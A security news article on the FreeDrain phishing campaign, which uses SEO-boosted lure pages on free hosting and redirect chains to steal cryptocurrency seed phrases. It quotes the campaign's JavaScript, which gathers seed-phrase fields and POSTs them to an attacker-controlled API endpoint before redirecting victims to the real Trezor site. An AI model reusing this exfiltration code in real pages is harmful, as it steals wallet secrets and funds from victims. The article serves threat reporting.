10 May 2025

FreeDrain Phishing Operation Targets Cryptocurrency Users

A sophisticated network drains digital wallets using deceptive tactics and SEO manipulation.

A sprawling phishing operation dubbed “FreeDrain” has emerged as an industrial-scale cryptocurrency theft network that systematically targets and drains digital wallets. This sophisticated campaign leverages search engine manipulation and free-tier web hosting services to create an extensive web of malicious sites that appear legitimate to unsuspecting users searching for cryptocurrency wallet information.

The attack begins when users search for wallet-related queries such as “Trezor wallet balance” or “Ledger Live” on major search engines. Victims click on high-ranking malicious results, often appearing on the first page of search results, and land on seemingly helpful pages. These initial lure pages—typically a single large image of a legitimate wallet interface—redirect users through a series of hops before eventually reaching a phishing page designed to steal wallet seed phrases.

SentinelOne researchers, in collaboration with Validin, recently unveiled the full scope of this operation at PIVOTcon 2025, identifying over 38,000 distinct FreeDrain subdomains hosting lure pages. Their investigation began after a distressed victim reported losing approximately 8 BTC (worth around $500,000) after entering their seed phrase on a fake Trezor wallet site.

“FreeDrain represents a modern blueprint for scalable phishing operations,” noted Tom Hegel, Principal Threat Researcher at SentinelOne. “What makes this campaign particularly effective is its ability to thrive on free-tier platforms, evade traditional abuse detection, and adapt rapidly to infrastructure takedowns.”

The technical sophistication of FreeDrain lies in its multi-layered approach. When a victim clicks a malicious search result hosted on platforms like gitbook.io or webflow.io, they encounter a page displaying a screenshot of a legitimate wallet interface. Clicking this image triggers a series of redirects through algorithmically generated domains like “shotheatsgnovel.com” or “bildherrywation.com” before landing on the final phishing page.

The actual credential theft occurs through unobfuscated JavaScript that sends the victim’s seed phrase to attacker-controlled endpoints. A sample of the exfiltration code reveals its straightforward yet effective approach:

```javascript
const data = {};
// Collect each seed-phrase word field into phrase0, phrase1, ...
inputs.forEach((input, index) => {
  data[`phrase${index}`] = input.value.trim();
});
data.subject = "Trezor connect2";
data.message = "Successful fetch data";
$.ajax({
  type: "POST",
  // Attacker-controlled AWS API Gateway endpoint (defanged as reported)
  url: "https://rfhwuwixxi.execute-api.us-east-1.amazonaws[.]com/pro",
  datatype: "json",
  crossDomain: true,
  contentType: "application/json; charset=utf-8",
  data: JSON.stringify(data),
  // Whether the POST succeeds or fails, the victim is sent on to the real Trezor Suite
  success: function (result) {
    window.location.href = 'https://suite.trezor.io/web/';
  },
  error: function (xhr, status, error) {
    window.location.href = 'https://suite.trezor.io/web/';
  }
});
```

This code sends the captured seed phrase to an AWS API Gateway endpoint before redirecting the victim to the legitimate wallet site, leaving them unaware their credentials have been compromised until their funds disappear.

Analysis of FreeDrain’s infrastructure revealed that the operation is likely run by individuals based in the UTC+05:30 timezone (Indian Standard Time), working standard business hours with clear weekday patterns and midday breaks—suggesting a structured, professional operation rather than opportunistic attacks.

FreeDrain’s operation has been stealthily siphoning digital assets for years, exploiting the trust associated with platforms like gitbook.io, webflow.io, and github.io. By orchestrating a sprawling network of over 38,000 subdomains hosting lure pages, the operation funnels victims into phishing sites designed to steal sensitive seed phrases.

These phishing pages, often hosted on robust cloud infrastructures like Amazon S3 and Azure Web Apps, mimic legitimate wallet interfaces with alarming precision, making it nearly impossible for users to discern the fraud until their funds are irreversibly drained. The operational workflow of FreeDrain is deceptively simple yet brutally effective.

Victims typically begin by searching for wallet-related queries on major search engines like Google, Bing, or DuckDuckGo, where malicious results, boosted through SEO tactics like spamdexing and AI-generated content, appear prominently. Upon clicking these results, users land on lure pages featuring static screenshots of legitimate wallet interfaces, often hosted on trusted free platforms. These pages redirect victims through a chain of intermediary domains—sometimes up to five hops—before arriving at a phishing site that prompts the entry of seed phrases.

The stolen data is then transmitted via unobfuscated JavaScript POST requests to attacker-controlled endpoints, with funds siphoned off and laundered through cryptocurrency mixers within minutes. Intriguingly, metadata from GitHub repositories and Webflow publish timestamps strongly indicate that FreeDrain operators are based in the UTC+05:30 timezone (likely India), adhering to a standard 9-to-5 weekday schedule.

Despite documented activity since 2022 and an acceleration in 2024, systemic weaknesses in abuse detection and reporting mechanisms across free-tier platforms have allowed FreeDrain to persist. According to the SentinelOne report, this operation underscores a critical need for enhanced platform-level defenses, proactive monitoring, and user education to combat such financially motivated cyber threats.

The abuse of legitimate services not only facilitates fraud but also erodes trust, posing reputational and operational risks to these platforms. As the digital landscape continues to evolve, the threat posed by operations like FreeDrain highlights the importance of vigilance and education in safeguarding personal and financial information.

In summary, FreeDrain represents a significant challenge in the realm of cybersecurity, particularly for cryptocurrency users. As phishing techniques grow increasingly sophisticated, the need for robust defenses and informed users becomes paramount. With over 38,000 subdomains identified and a professional operation behind the scenes, the implications of this campaign are profound, calling for immediate action from both users and service providers alike.